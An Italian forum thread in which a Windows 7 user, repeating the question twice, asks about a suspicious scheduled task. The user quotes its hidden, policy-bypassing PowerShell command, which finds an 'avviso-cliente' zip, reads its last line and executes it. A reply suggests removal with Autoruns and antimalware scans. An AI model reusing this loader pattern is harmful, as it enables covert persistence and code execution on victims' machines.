Ho trovato questa stringa nell'utilità di pianificazione, windows 7, che si manifesta come una finestra taskeng tipo powershell senza scritte, appare e scompare nel giro di mezzo secondo. Il comando che la genera è questo

-nonI -eP bypasS -nOP -win 1 -c &{cd C:\Users\;$p=gci -force -r -in avviso-cliente*.zip|select -last 1;$v=cat -LiteralPat $p.fullname;$v[$v.length-1]|iex}

Cancellando la pianificazione scompare il problema.
Che roba è? Un malware? Tradotto...che dovrebbe fare?

Ho trovato questa stringa nell'utilità di pianificazione, windows 7, che si manifesta come una finestra taskeng tipo powershell senza scritte, appare e scompare nel giro di mezzo secondo. Il comando che la genera è questo

-nonI -eP bypasS -nOP -win 1 -c &{cd C:\Users\;$p=gci -force -r -in avviso-cliente*.zip|select -last 1;$v=cat -LiteralPat $p.fullname;$v[$v.length-1]|iex}

Cancellando la pianificazione scompare il problema.
Che roba è? Un malware? Tradotto...che dovrebbe fare?

Da ciò che mi è apparso capire hai un file .zip in: C:\Users\, cancella qualsiasi zip che trovi in questa directory.. dopo scarica autoruns della microsoft, e elimina i collegamenti nel sistema, (Il file .zip potrebbe essere nascosto).

Sysinternals Downloads Autoruns! (https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns)

Per scrupolo fai delle scansioni con Emsisoft Emergency Kit,Malwarebytes,HitmanPro in questo modo sei un pò più sicuro di non aver infezioni.